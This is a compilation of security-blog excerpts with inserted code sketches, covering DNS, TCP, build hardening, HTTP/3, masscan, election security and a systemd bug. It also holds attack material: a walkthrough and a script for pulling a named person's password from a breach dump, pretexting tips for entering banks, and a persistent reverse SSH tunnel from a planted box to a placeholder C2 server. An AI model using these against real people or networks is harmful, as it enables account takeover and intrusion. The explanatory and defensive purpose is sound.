But that's because this "expert" doesn't know how DNS works. Your computer is configured to automatically put local suffixes on the end of names, so that you only have to look up "2ndfloorprinter" instead of a full name like "2ndfloorprinter.engineering.example.com".

When looking up a DNS name, your computer may try to look up the name both with and without the suffix. Thus, sometimes your computer looks up "www.google.com.engineering.example.com" when it wants simply "www.google.com".

Apparently, Alfabank configures its Moscow computers to have the suffix "moscow.alfaintra.net". That means any DNS name that gets resolved will sometimes get this appended, so we'll sometimes see "www.google.com.moscow.alfaintra.net".

Since we already know there were lookups from that organization for "trump-email.com", the fact that we also see "trump-email.com.moscow.alfaintra.net" tells us nothing new.

In other words, the conspiracy theorists didn't understand it, so they came up with their own explanation, and this confirmed their biases. In fact, there is a simpler explanation that neither confirms nor refutes anything.

The reason for the DNS lookups for "trump-email.com" is still unexplained. Maybe they are because of something nefarious. The Trump organizations had all sorts of questionable relationships with Russian banks, so such a relationship wouldn't be surprising. But here's the thing: just because we can't come up with a simpler explanation doesn't make them proof of a Trump-Alfabank conspiracy. Until we know why those lookups were generated, they are an "unknown" and not "evidence".

The reason I write this post is because of this story about a student expelled due to "grade hacking". It sounds like this sort of situation, where the IT department saw anomalies it couldn't explain, so the anomalies became proof of the theory they'd created to explain them.

Unexplained phenomena are unexplained. They are not evidence confirming your theory that explains them.
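Here's a small sketch (mine, not from the post) simulating how a stub resolver applies a configured search suffix; this behavior alone produces lookups like "trump-email.com.moscow.alfaintra.net" from perfectly ordinary queries. The suffix mirrors the example in the text; the ndots threshold is a typical resolver default.

```python
# Simulate a stub resolver's search-list behavior: names get tried both
# as-is and with the configured local suffix appended, so ordinary
# lookups routinely generate "name.local.suffix" queries on the wire.

SEARCH_SUFFIX = "moscow.alfaintra.net"   # the suffix described in the text

def candidate_queries(name: str, ndots: int = 1) -> list[str]:
    """Names a resolver may actually send for one application lookup."""
    suffixed = f"{name}.{SEARCH_SUFFIX}"
    # Unqualified short names try the suffix first; names that already
    # contain dots are tried as-is, then fall back to the suffixed form.
    if name.count(".") < ndots:
        return [suffixed, name]
    return [name, suffixed]

print(candidate_queries("2ndfloorprinter"))
print(candidate_queries("trump-email.com"))
# -> ['trump-email.com', 'trump-email.com.moscow.alfaintra.net']
```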
ErrataRob 2019-02-25 18:20:47 A basic question about TCP (direct link)

So on Twitter, somebody asked this question:

"I have a very basic computer networking question: when sending a TCP packet, is the packet ACK'ed at every node in the route between the sender and the recipient, or just by the final recipient?"

This isn't just a basic question, it is the basic question, the defining aspect of TCP/IP that makes the Internet different from the telephone network that predated it.

Remember that the telephone network was already a cyberspace before the Internet came around. It allowed anybody to create a connection to anybody else. Most circuits/connections were 56 kilobits per second. Using the "T" system, these could be aggregated into faster circuits/connections. The "T1" line consisting of 1.544 mbps was an important standard back in the day.

In the phone system, when a connection is established, resources must be allocated in every switch along the path between the source and destination. When the phone system is overloaded, such as when you call loved ones when there's been an earthquake/tornado in their area, you'll sometimes get a message "No circuits are available". Due to congestion, it can't reserve the necessary resources in one of the switches along the route, so the call can't be established.

"Congestion" is important. Keep that in mind. We'll get to it a bit further down.

The idea that each router needs to ACK a TCP packet means that the router needs to know about the TCP connection, and that it needs to reserve resources for it.

This was actually the original design of the OSI Network Layer.

Let's rewind a bit and discuss "OSI". Back in the 1970s, the major computer companies of the time all had their own proprietary network stacks. IBM computers couldn't talk to DEC computers, and neither could talk to Xerox computers. They all worked differently. The need for a standard protocol stack was obvious.

To do this, the "Open Systems Interconnect" or "OSI" group was established under the auspices of the ISO, the international standards organization.

The first thing the OSI did was create a model for how protocol stacks would work. That's because different parts of the stack need to be independent from each other.

For example, consider the local/physical link between two nodes, such as between your computer and the local router, or your router to the next router. You use Ethernet or WiFi to talk to your router. You may use 802.11n WiFi in the 2.4GHz band, or 802.11ac in the 5GHz band. However you do this, it doesn't matter as far as the TCP/IP packets are concerned. This is just between you and your router, and all this information is stripped out of the packets before they are forwarded across the Internet.

Likewise, your ISP may use cable modems (DOCSIS) to connect your router to their routers, or they may use xDSL. This information likewise is stripped off before packets go further into the Internet. When your packets reach the other end, like at Google's servers, they contain no traces of this.

There are 7 layers to the OSI model. The one we are most interested in is layer 3, the "Network Layer". This is the layer at which IPv4 and IPv6 operate. TCP is layer 4, the "Transport Layer".

The original idea for the network layer was that it would be connection oriented, modeled after the phone system. The phone system was already offering such a service, called X.25, which the OSI model was built around. X.25 was important in the pre-Internet era for creating long-distance computer connections, allowing cheaper connections than renting a full T1 circuit from the phone company. Normal telephone circuits are designed for a continuous flow of data, whereas computer communication is bursty. X.25 was especially popular for terminals, because it only needed to send packets from the terminal when users were typing.

Layer 3 also included…
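A minimal sketch of the end-to-end answer in practice: the application below never sees an ACK at all, because acknowledgment happens between the two endpoint kernels and nowhere else; the host and port are placeholders.

```python
# TCP acknowledgments are end-to-end: only the destination host's
# kernel ACKs these bytes. The routers in between forward IP packets
# and keep no per-connection state. Host/port are placeholders.
import socket

with socket.create_connection(("example.com", 80), timeout=5) as s:
    s.sendall(b"HEAD / HTTP/1.1\r\nHost: example.com\r\n\r\n")
    # sendall() hands the bytes to our kernel, which retransmits any
    # lost segments until the far endpoint -- not any router -- ACKs.
    reply = s.recv(4096)
    print(reply.decode(errors="replace").splitlines()[0])
```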
ErrataRob 2019-02-08 10:08:18 How Bezos's dick pics might've been exposed (direct link)

In the news, the National Enquirer has extorted Amazon CEO Jeff Bezos by threatening to publish the sext messages/dick pics he sent to his mistress. How did the National Enquirer get them? There are rumors that maybe Trump's government agents or the "deep state" were involved in this sordid mess. The more likely explanation is that it was a simple hack. Teenage hackers regularly do such hacks -- they aren't hard.

This post is a description of how such hacks might've been done.

To start with, from which end were they stolen? As a billionaire, I'm guessing Bezos himself has pretty good security, so I'm going to assume it was the recipient, his girlfriend, who was hacked.

The hack starts by finding the email address she uses. People use the same email address for both public and private purposes. There are lots of "people finder" services on the Internet that you can use to track this information down. These services are partly scams, using "dark patterns" to get you to spend tons of money on them without realizing it, so be careful.

Using one of these sites, I quickly found a couple of email accounts she's used, one at HotMail, another at GMail. I've blocked out her address. I want to describe how easy the process is; I'm not trying to doxx her.

Next, I enter those email addresses into the website http://haveibeenpwned.com to see if hackers have ever stolen her account password. When hackers break into websites, they steal the account passwords, and then exchange them on the dark web with other hackers. The above website tracks this, helping you discover if one of your accounts has been so compromised. You should take this opportunity to enter your email address in this site to see if it's been so "pwned".

I find that her email addresses have been included in that recent dump of 770 million accounts called "Collection#1".

The haveibeenpwned.com site won't disclose the passwords, only the fact they've been pwned. However, I have a copy of that huge Collection#1 dump, so I can search it myself to get her password. As this output shows, I get a few hits, all with the same password.

At this point, I have a password, but not necessarily the password to access any useful accounts. For all I know, this was the…
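Here's a sketch of the kind of search being described, streaming through a combo-list dump for lines mentioning a given address; the email:password line layout is an assumption about the dump's format, and the filename and address are placeholders.

```python
# Scan a large credential dump for one email address. Combo lists are
# commonly "email:password" per line, but that layout is an assumption.
# Streams line by line, so the dump's size doesn't matter.

def search_dump(path: str, email: str):
    target = email.lower()
    with open(path, encoding="utf-8", errors="ignore") as f:
        for line in f:
            if target in line.lower():
                yield line.strip()

for hit in search_dump("collection1.txt", "victim@example.com"):
    print(hit)
```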
ErrataRob 2019-01-28 22:21:56 Passwords in a file (direct link)

My dad is on some sort of committee for his local homeowners association. He asked about saving all the passwords in a file stored on Microsoft's cloud OneDrive, along with policy/procedures for the association. I assumed he called because I'm an internationally recognized cyberexpert. Or maybe he just wanted to chat with me*. Anyway, I thought I'd write up a response.

The most important rule of cybersecurity is that it depends upon the risks/costs. That means if what you want to do is write down the procedures for operating a garden pump, including the passwords, then that's fine. This is because there's not much danger of hackers exploiting this. On the other hand, if the question is passwords for the association's bank account, then DON'T DO THIS. Such passwords should never be online. Instead, write them down and store the pieces of paper in a secure place.

OneDrive is secure, as much as anything is. The problem is that people aren't secure. There's probably one member of the homeowners association who is constantly infecting themselves with viruses or falling victim to scams. This is the person you are giving OneDrive access to. This is fine for the meaningless passwords, but very much not fine for bank accounts.

OneDrive also has some useful backup features. Thus, when one of your members infects themselves with ransomware, which will encrypt all of the OneDrive's contents, you can retrieve the old versions of the documents. I highly recommend groups like the homeowners association use OneDrive. I use it as part of my Office 365 subscription for $99/year.

Just don't do this for banking passwords. In fact, not only should you not store such a password online, you should strongly consider getting "two-factor authentication" set up for the account. This is a system where you need an additional hardware device/token in addition to a password (in some cases, your phone can be used as the additional device). This may not work if multiple people need to access a common account, but then, you should have multiple passwords, one for each individual, in such cases. Your bank should have descriptions of how to set this up. If your bank doesn't offer two-factor authentication for its websites, then you really need to switch banks.

For individuals, write your passwords down on paper. For elderly parents, write down a copy and give it to your kids. It should go without saying: store that paper in a safe place, ideally a safe, not a post-it note glued to your monitor. Again, this is for your important passwords, like for bank accounts and e-mail. For your Spotify or Pandora accounts (music services), security really doesn't matter.

Lastly, the way hackers most often break into things like bank accounts is because people use the same password everywhere. When one site gets hacked, those passwords are then used to hack accounts on other websites. Thus, for important accounts, don't reuse passwords; make them unique for just that account. Since you can't remember unique passwords for every account, write them down.

You can check if your password has been hacked this way by checking http://haveibeenpwned.com and entering your email address. Entering my dad's email address, I find that his accounts at Adobe, LinkedIn, and Disqus have been discovered by hackers (due to hacks of those websites) and published. I sure hope that whatever those passwords were, they are not the same as or similar to his passwords for GMail or his bank account.
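The same site also exposes a documented "Pwned Passwords" range API for checking a password itself without ever sending it; here's a sketch using that k-anonymity endpoint (the API is real, but verify the details in the HIBP documentation before relying on this code).

```python
# Check a password against Have I Been Pwned without revealing it:
# send only the first 5 hex chars of its SHA-1, then look for the rest
# of the hash in the returned candidate list (k-anonymity scheme).
import hashlib
import urllib.request

def pwned_count(password: str) -> int:
    """How many times this password appears in known breach dumps."""
    sha1 = hashlib.sha1(password.encode()).hexdigest().upper()
    prefix, suffix = sha1[:5], sha1[5:]
    req = urllib.request.Request(
        f"https://api.pwnedpasswords.com/range/{prefix}",
        headers={"User-Agent": "password-check-sketch"})
    with urllib.request.urlopen(req) as resp:
        for line in resp.read().decode().splitlines():
            candidate, _, count = line.partition(":")
            if candidate == suffix:
                return int(count)
    return 0

print(pwned_count("password123"))   # a very large number
```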
* the lame joke at the top was my dad's, so don't blame me :-)
ErrataRob 2018-12-15 22:40:22 Notes on Build Hardening (direct link)

I thought I'd comment on a paper about "build safety" in consumer products, describing how software is built to harden it against hackers trying to exploit bugs.

What is build safety?

Modern languages (Java, C#, Go, Rust, JavaScript, Python, etc.) are inherently "safe", meaning they don't have "buffer overflows" or related problems.

However, C/C++ is "unsafe", and is the most popular language for building stuff that interacts with the network. In other cases, while the language itself may be safe, it'll use underlying infrastructure ("libraries") written in C/C++. When we are talking about hardening builds, making them safe or secure, we are talking about C/C++.

In the last two decades, we've improved both hardware and operating systems around C/C++ in order to impose safety on it from the outside. We do this with options when the software is built (compiled and linked), and then when the software is run.

That's what the paper above looks at: how consumer devices are built using these options, and thereby, measuring the security of these devices.

In particular, we are talking about the Linux operating system here and the GNU compiler gcc. Consumer products almost always use Linux these days, though a few also use embedded Windows or QNX. They are almost always built using gcc, though some are built using a clone known as clang (or llvm).

How software is built

Software is first compiled, then linked. Compiling means translating the human-readable source code into machine code. Linking means combining multiple compiled files into a single executable.

Consider a program hello.c. We might compile it using the following command:

gcc -o hello hello.c

This command takes the file hello.c, compiles it, then outputs -o an executable with the name hello.

We can set additional compilation options on the command line here. For example, to enable stack guards, we'd compile with a command that looks like the following:

gcc -o hello -fstack-protector hello.c

In the following sections, we are going to look at specific options and what they do.

Stack guards

A running program has various kinds of memory, optimized for different use cases. One chunk of memory is known as the stack. This is the scratch pad for functions. When a function in the code is called, the stack grows with the additional scratchpad needs of that function, then shrinks back when the function exits. As functions call other functions, which call other functions, the stack keeps growing larger and larger. When they return, it then shrinks back again.

The scratch pad for each function is known as the stack frame. Among the things stored in the stack frame is the return address, where the function was called from, so that when it exits, the caller of the function can continue executing where it left off.

The way stack guards work is to stick a carefully constructed value in between each stack frame, known as a canary. Right before the function exits, it'll check this canary in order to validate it hasn't been corrupted. If corruption is detected, the program exits, or crashes, to prevent worse things from happening.

This solves the most commonly exploited vulnerability in C/C++ code, the stack buffer overflow. This is the bug described in that famous paper Smashing the Stack for Fun and Profit…
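In the same spirit as the paper's measurements, here's a rough sketch of how one can detect some of these build options in a compiled binary; it shells out to readelf (from binutils) and greps for telltale markers, the way tools like checksec do. It's a heuristic, not a definitive check.

```python
# Heuristic hardening check for an ELF binary: stack guards leave a
# __stack_chk_fail symbol behind, full RELRO shows as a GNU_RELRO
# segment plus BIND_NOW, and a non-executable stack shows as a
# GNU_STACK segment without the E flag. Rough check only.
import subprocess
import sys

def readelf(args: list[str], path: str) -> str:
    return subprocess.run(["readelf", *args, path],
                          capture_output=True, text=True).stdout

def check(path: str) -> dict:
    dyn = readelf(["-d"], path)            # dynamic section
    syms = readelf(["--dyn-syms"], path)   # dynamic symbols
    phdrs = readelf(["-lW"], path)         # program headers
    return {
        "stack_guard": "__stack_chk_fail" in syms,
        "full_relro": "GNU_RELRO" in phdrs and "BIND_NOW" in dyn,
        "nx_stack": "GNU_STACK" in phdrs and "RWE" not in phdrs,
    }

print(check(sys.argv[1]))
```

Running it against the two hello binaries above would show stack_guard flipping from False to True once -fstack-protector is added.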
ErrataRob 2018-12-11 22:59:55 Notes about hacking with drop tools (direct link)

In this report, Kaspersky found Eastern European banks hacked with Raspberry Pis and "Bash Bunnies" (DarkVishnya). I thought I'd write up some more detailed notes on this.

Drop tools

A common hacking/pen-testing technique is to drop a box physically on the local network. On this blog, there are articles going back 10 years discussing this. In the old days, this was done with a $200 "netbook" (a cheap notebook computer). These days, it can be done with $50 "Raspberry Pi" computers, or even $25 consumer devices reflashed with Linux.

A "Raspberry Pi" is a $35 single-board computer, to which you'll need to add about another $15 worth of stuff to get it running (power supply, flash drive, and cables). These are extremely popular hobbyist computers that are used everywhere from home servers to robotics to hacking. They have spawned a large number of clones, like the ODROID, Orange Pi, NanoPi, and so on. With a quad-core, 1.4 GHz, single-issue processor, 2 gigs of RAM, and typically at least 8 gigs of flash, these are pretty powerful computers.

Typically what you'd do is install Kali Linux. This is a Linux "distro" that contains all the tools hackers want to use.

You then drop this box physically on the victim's network. We often called these "dropboxes" in the past, but now that there's a cloud service called "Dropbox", this becomes confusing, so I guess we can call them "drop tools". The advantage of using something like a Raspberry Pi is that it's cheap: once dropped on a victim's network, you probably won't ever get it back again.

Gaining physical access to even secure banks isn't that hard. Sure, getting to the money is tightly controlled, but other parts of the bank aren't nearly as secure. One good trick is to pretend to be a banking inspector. At least in the United States, they'll quickly bend over and spread them if they think you are a regulator. Or, you can pretend to be a maintenance worker there to fix the plumbing. All it takes is a uniform with a logo and what appears to be a valid work order. If questioned, whip out the clipboard and ask them to sign off on the work. Or, if all else fails, just walk in brazenly as if you belong.

Once inside the physical network, you need to find a place to plug something in. Ethernet and power plugs are often underneath/behind furniture, so that's not hard. You might find access to a wiring closet somewhere, as Aaron Swartz famously did. You'll usually have to connect via Ethernet, as it requires no authentication/authorization. If you could connect via WiFi, you could probably do it outside the building using directional antennas without going through all this.

Now that you've got your evil box installed, there is the question of how you remotely access it. It's almost certainly firewalled, preventing any inbound connection.

One choice is to configure it for outbound connections. When doing pentests, I configure reverse SSH command prompts to a command-and-control server. Another alternative is to create an SSH Tor hidden service. There are a myriad of other ways you might do this. They all suffer the problem that anybody looking at the organization's outbound traffic can notice these connections.

Another alternative is to use the WiFi. This allows you to physically sit outside in the parking lot and connect to the box. This can sometimes be detected using WiFi intrusion prevention systems, though it's not hard to get around that. The downside is that it puts you in some physical jeopardy, because you have to be physically near the building. However, you can mitigate this in some cases, such as by sticking a second Raspberry Pi in a nearby bar that is close enough to connect, and then using the bar's Internet connection to hop-scotch on in.
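Here's a sketch of the "reverse SSH command prompt" approach described above: the drop box dials out to the command-and-control server and keeps the tunnel alive. The hostnames and ports are placeholders; the ssh flags shown are standard OpenSSH, and this is the sort of thing you'd only run on an authorized engagement.

```python
# Keep a reverse SSH tunnel up from the drop box to a C2 server: the box
# dials *out* (firewalls usually allow that), exposing its own SSH port
# on the C2 host. Equivalent to re-running, on failure:
#   ssh -N -R 2222:localhost:22 tunnel@c2.example.com
import subprocess
import time

CMD = ["ssh", "-N",
       "-o", "ServerAliveInterval=30",   # notice dead tunnels quickly
       "-o", "ExitOnForwardFailure=yes",
       "-R", "2222:localhost:22",        # C2's :2222 -> drop box's sshd
       "tunnel@c2.example.com"]          # placeholder C2 account/host

while True:                              # re-dial whenever the tunnel drops
    subprocess.run(CMD)
    time.sleep(60)
```

From the C2 host, the operator then runs ssh against localhost:2222, which rides the outbound tunnel back down to the drop box's own SSH daemon.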
ErrataRob.webp 2018-11-18 19:51:36 Some notes about HTTP/3 (lien direct) HTTP/3 is going to be standardized. As an old protocol guy, I thought I'd write up some comments.Google (pbuh) has both the most popular web browser (Chrome) and the two most popular websites (#1 Google.com #2 Youtube.com). Therefore, they are in control of future web protocol development. Their first upgrade they called SPDY (pronounced "speedy"), which was eventually standardized as the second version of HTTP, or HTTP/2. Their second upgrade they called QUIC (pronounced "quick"), which is being standardized as HTTP/3.SPDY (HTTP/2) is already supported by the major web browser (Chrome, Firefox, Edge, Safari) and major web servers (Apache, Nginx, IIS, CloudFlare). Many of the most popular websites support it (even non-Google ones), though you are unlikely to ever see it on the wire (sniffing with Wireshark or tcpdump), because it's always encrypted with SSL. While the standard allows for HTTP/2 to run raw over TCP, all the implementations only use it over SSL.There is a good lesson here about standards. Outside the Internet, standards are often de jure, run by government, driven by getting all major stakeholders in a room and hashing it out, then using rules to force people to adopt it. On the Internet, people implement things first, and then if others like it, they'll start using it, too. Standards are often de facto, with RFCs being written for what is already working well on the Internet, documenting what people are already using. SPDY was adopted by browsers/servers not because it was standardized, but because the major players simply started adding it. The same is happening with QUIC: the fact that it's being standardized as HTTP/3 is a reflection that it's already being used, rather than some milestone that now that it's standardized that people can start using it.QUIC is really more of a new version of TCP (TCP/2???) than a new version of HTTP (HTTP/3). It doesn't really change what HTTP/2 does so much as change how the transport works. Therefore, my comments below are focused on transport issues rather than HTTP issues.The major headline feature is faster connection setup and latency. TCP requires a number of packets being sent back-and-forth before the connection is established. SSL again requires a number of packets sent back-and-forth before encryption is established. If there is a lot of network delay, such as when people use satellite Internet with half-second ping times, it can take quite a long time for a connection to be established. By reducing round-trips, connections get setup faster, so that when you click on a link, the linked resource pops up immediatelyThe next headline feature is bandwidth. There is always a bandwidth limitation between source and destination of a network connection, which is almost always due to congestion. Both sides need to discover this speed so that they can send packets at just the right rate. Sending packets too fast, so that they'll get dropped, causes even more congestion for others without improving transfer rate. Sending packets too slowly means unoptimal use of the network.How HTTP traditionally does this is bad. Using a single TCP connection didn't work for HTTP because interactions with websites require multiple things to be transferred simultaneously, so browsers opened multiple connections to the web server (typically 4). 
However, this breaks the bandwidth estimation, because each of your TCP connections is trying to do it independently as if the other connections don't exist. SPDY addressed this by its multiplexing feature that combined multiple interactions between browser/server with a single bandwidth calculation. QUIC extends this multiplexing, making it even easier to handle multiple interactions between the browser/server, without any one interaction blocking another, but with a common bandwidth estimation. This will make interactions smoother from a user's perspective, while
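Though you'll rarely see HTTP/2 in cleartext on the wire, it's easy to confirm that a server negotiates it over TLS. A quick check with curl (a sketch, assuming a curl build with HTTP/2 support; the URL is just an example):

$ curl -sI --http2 https://www.google.com/ | head -1
HTTP/2 200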
ErrataRob.webp 2018-11-04 18:22:46 Brian Kemp is bad on cybersecurity (lien direct) I'd prefer a Republican governor, but as a cybersecurity expert, I have to point out how bad Brian Kemp (candidate for Georgia governor) is on cybersecurity. When notified about vulnerabilities in election systems, his response has been to shoot the messenger rather than fix the vulnerabilities. This was the premise behind the cybercrime bill earlier this year that was ultimately vetoed by the current governor after vocal opposition from cybersecurity companies. More recently, he just announced that he's investigating the Georgia State Democratic Party for a "failed hacking attempt". According to news stories, state elections websites are full of common vulnerabilities, those documented by the OWASP Top 10, such as "direct object references" that would allow any election registration information to be read or changed, allowing a hacker to cancel registrations of voters from the other party. Testing for such weaknesses is not a crime. Indeed, it's desirable that people can test for security weaknesses. Systems that aren't open to test are insecure. This concept is the basis for many policy initiatives at the federal level, to not only protect researchers probing for weaknesses from prosecution, but to even provide bounties encouraging them to do so. The DoD has a "Hack the Pentagon" initiative encouraging exactly this. But the State of Georgia is stereotypically backwards and thuggish. Earlier this year, the legislature passed SB 315, which criminalized the mere act of attempting to access a computer without permission in order to probe for possible vulnerabilities. To the ignorant and backwards person, this seems reasonable: of course this bad activity should be outlawed. But as we in the cybersecurity community have learned over the last decades, this only bars your friends from finding security vulnerabilities, and does nothing to discourage your enemies. Russian election meddling hackers are not deterred by such laws, only Georgia residents concerned whether their government websites are secure. It's your own users, and well-meaning security researchers, who are the primary source for improving security. Unless you live under a rock (like Brian Kemp, apparently), you'll have noticed that every month you have your Windows desktop or iPhone nagging you about updating the software to fix security issues. If you look behind the scenes, you'll find that most of these security fixes come from outsiders. They come from technical experts who accidentally come across vulnerabilities. They come from security researchers who specifically look for vulnerabilities. It's because of this "research" that systems are mostly secure today. A few days ago was the 30th anniversary of the "Morris Worm" that took down the nascent Internet in 1988. The net of that time was hostile to security research, with major companies ignoring vulnerabilities. Systems then were laughably insecure, but vendors tried to address the problem by suppressing research. The Morris Worm exploited several vulnerabilities that were well-known at the time, but ignored by the vendor (in this case, primarily Sun Microsystems). Since then, with a culture of outsiders disclosing vulnerabilities, vendors have been pressured into fixing them. This has led to vast improvements in security. I'm posting this from a public WiFi hotspot in a bar, for example, because computers are secure enough for this to be safe. 
10 years ago, such activity wasn't safe. The Georgia Democrats obviously have concerns about the integrity of election systems. They have every reason to thoroughly probe an elections website looking for vulnerabilities. This sort of activity should be encouraged, not supp Vulnerability Threat Guideline
ErrataRob.webp 2018-11-02 02:57:36 Why no cyber 9/11 for 15 years? (lien direct) This article in The Atlantic asks why there hasn't been a cyber-terrorist attack for the last 15 years, or as it phrases it:
National-security experts have been warning of terrorist cyberattacks for 15 years. Why hasn't one happened yet?
As a pen-tester who's broken into power grids and found 0day exploits in control center systems, I thought I'd write up some comments. Instead of asking why one hasn't happened yet, maybe we should instead ask why national-security experts keep warning about them. One possible answer is that national-security experts are ignorant. I get the sense that "national security experts" have very little expertise in cyber. That's why I include a brief resume at the top of this article: I've actually broken into a power grid and found 0days in critical power grid products (specifically, the ABB implementation of ICCP on AIX -- it's rather an obvious buffer-overflow, *cough* ASN.1 *cough*, I don't know if they ever fixed it). Another possibility is that they are fear mongering in order to support their agenda. That's the problem with "experts": they get their expertise by being employed to achieve some goal. The ones who know most about an issue are simultaneously the ones most biased about an issue. They have every incentive to make people be afraid, and little incentive to tell the truth. The most likely answer, though, is simply because they can. Anybody can warn of "digital 9/11" and be taken seriously, regardless of expertise. They'll get all the press. It's always the Morally Right thing to say. You never have to back it up with evidence. Conversely, those who say the opposite don't get the same level of press, and are frequently challenged to defend their abnormal stance. Indeed, that's how this article by The Atlantic works. Its entire premise is that the national security experts are still "right" even though their predictions haven't happened, and it's reality that's "wrong". Now let's consider the original question. One good answer in the article is "cause certain types of fear and terror, that garner certain media attention, that galvanize followers". Blowing something up causes more fear in the target population than deleting some data. But the same is true of the terrorists themselves: they prefer violence. In other words, what motivates terrorists, the ends or the means? Is it the need to achieve a political goal? Or is it simply about looking for an excuse to commit violence? I suspect that it's the latter. It's not that terrorists are violent so much as violent people are attracted to terrorism. This can explain a lot, such as why they have such poor op-sec and encryption, as I've written about before. They enjoy learning how to shoot guns and trigger bombs, but they don't enjoy learning how to use a computer correctly. I've explored the cyber Islamic dark web and come to a couple conclusions about it. The primary motivation of these hackers is gay porn. A frequent initiation rite to gain access to these forums is to post pictures of your, well, equipment. Such things are repressed in their native countries and societies, so hacking becomes a necessary skill in order to get it. It's hard for us to understand their motivations. From our western perspective, we'd think gay young men would be on our side, motivated to fight against their own governments in defense of gay rights, in order to achieve marriage equality. None of them want that. 
Their goal is to get married and have children. Sure, they want gay sex and intimate relationships with men, but they also want a subservient wife who manages the household, and the deep family ties that Hack
ErrataRob.webp 2018-11-01 02:03:51 Masscan and massive address lists (lien direct) I saw this go by on my Twitter feed. I thought I'd blog on how masscan solves the same problem.
If you do @nmap scanning with big exclusion lists, things are about to get a lot faster. ;) - Daniel Miller ✝ (@bonsaiviking) November 1, 2018
Both nmap and masscan are port scanners. The difference is that nmap does an intensive scan on a limited range of addresses, whereas masscan does a light scan on a massive range of addresses, including the range of 0.0.0.0 - 255.255.255.255 (all addresses). If you've got a 10-gbps link to the Internet, it can scan the entire thing in under 10 minutes, from a single desktop-class computer. How masscan deals with exclude ranges is probably its defining feature. That seems kinda strange, since it's a little-used feature in nmap. But when you scan the entire Internet, people will complain, with nasty emails, so you are going to build up a list of hundreds, if not thousands, of addresses to exclude from your scans. Therefore, the first design choice is to combine the two lists, the list of targets to include and the list of targets to exclude. Other port scanners don't do this because they typically work from a large include list and a short exclude list, so they optimize for the larger thing. In mass scanning the Internet, the exclude list is the largest thing, so that's what we optimize for. It makes sense to just combine the two lists. So the performance question now isn't how to look up an address in an exclude list efficiently, it's how to quickly choose a random address from a large include target list. Moreover, the decision is how to do it with as little state as possible. That's the trick for sending massive numbers of packets at rates of 10 million packets-per-second: not keeping any bookkeeping of what was scanned. I'm not sure exactly how nmap randomizes its addresses, but the documentation implies that it does a block of addresses at a time, and randomizes that block, keeping state on which addresses it's scanned and which ones it hasn't. The way masscan works is not to randomly pick an IP address so much as to randomize the index. To start with, we created a sorted list of IP address ranges, the targets. The total number of IP addresses in all the ranges is target_count (not the number of ranges but the number of all IP addresses). We then define a function pick() that returns one of those IP addresses given the index:
    ip = pick(targets, index);
Where index is in the range [0..target_count]. This function is just a binary search. After the ranges have been sorted, a start_index value is added to each range, which is the total number of IP addresses up to that point. Thus, given a random index, we search the list of start_index values to find which range we've chosen, and then which IP address within that range. The function is here, though reading it, I realize I need to refactor it to make it clearer. (I read the comments telling me to refactor it, and I realize I haven't gotten around to that yet :-). Given this system, we can now do an in-order (not randomized) port scan by doing the follow
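A minimal sketch of that pick() idea, not masscan's actual code; it assumes ranges[] is sorted and that each range's start_index holds the count of all addresses in earlier ranges:

#include <stddef.h>

struct range {
    unsigned begin;                 /* first IPv4 address in the range */
    unsigned end;                   /* last IPv4 address (inclusive) */
    unsigned long long start_index; /* addresses in all earlier ranges */
};

/* Return the index-th address across all ranges, via binary search
 * on start_index -- no per-scan bookkeeping required. */
unsigned pick(const struct range *ranges, size_t count, unsigned long long index)
{
    size_t lo = 0, hi = count;
    while (lo + 1 < hi) {
        size_t mid = lo + (hi - lo) / 2;
        if (ranges[mid].start_index <= index)
            lo = mid;
        else
            hi = mid;
    }
    /* offset of the chosen address within the found range */
    return ranges[lo].begin + (unsigned)(index - ranges[lo].start_index);
}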
ErrataRob.webp 2018-10-27 07:28:06 Systemd is bad parsing and should feel bad (lien direct) Systemd has a remotely exploitable bug in its DHCPv6 client. That means anybody on the local network can send you a packet and take control of your computer. The flaw is a typical buffer-overflow. Several news stories have pointed out that this client was written from scratch, as if that were the moral failing, instead of reusing existing code. That's not the problem. The problem is that it was written from scratch without taking advantage of the lessons of the past. It makes the same mistakes all over again. In the late 1990s and early 2000s, we learned that parsing input is a problem. The traditional ad hoc approach you were taught in school is wrong. It's wrong from an abstract theoretical point of view. It's wrong from the practical point of view, being error prone and leading to spaghetti code. The first thing you need to unlearn is byte-swapping. I know that this was some sort of epiphany you had when you learned network programming, but byte-swapping is wrong. If you find yourself using a macro to swap bytes, like the be16toh() macro used in this code, then you are doing it wrong. But, you say, the network byte-order is big-endian, while today's Intel and ARM processors are little-endian. So you have to swap bytes, don't you? No. As proof of the matter I point to every other language other than C/C++. They don't swap bytes. Their internal integer format is undefined. Indeed, something like JavaScript may be storing numbers as floating point. You can't muck around with the internal format of their integers even if you wanted to. An example of byte swapping in the code is something like this: In this code, it's taking a buffer of raw bytes from the DHCPv6 packet and "casting" it as a C internal structure. The packet contains a two-byte big-endian length field, "option->len", which the code must byte-swap in order to use. Among the errors here is casting an internal structure over external data. From an abstract theory point of view, this is wrong. Internal structures are undefined. Just because you can sort of know the definition in C/C++ doesn't change the fact that they are still undefined. From a practical point of view, this leads to confusion, as the programmer is never quite clear as to the boundary between external and internal data. You are supposed to rigorously verify external data, because the hacker controls it. You don't keep double-checking and second-guessing internal data, because that would be stupid. When you blur the lines between internal and external data, then your checks get muddled up. Yes you can, in C/C++, cast an internal structure over external data. But just because you can doesn't mean you should. What you should do instead is parse data the same way as if you were writing code in JavaScript. For example, to grab the DHCP6 option length field, you should write something like: Guideline
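The code image from the original post doesn't survive here, but the style it advocates looks like this sketch (buf, offset, and length are illustrative names for the raw packet bytes, the current parse position, and the packet size):

/* Parse the two-byte option code and length directly from the byte
 * stream: validate first, then build integers byte by byte -- no
 * struct casts, no byte-swapping macros. */
if (offset + 4 > length)
    return -1;                                  /* truncated input */
unsigned option_code = buf[offset + 0] << 8 | buf[offset + 1];
unsigned option_len  = buf[offset + 2] << 8 | buf[offset + 3];
if (offset + 4 + option_len > length)
    return -1;                                  /* option overruns packet */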
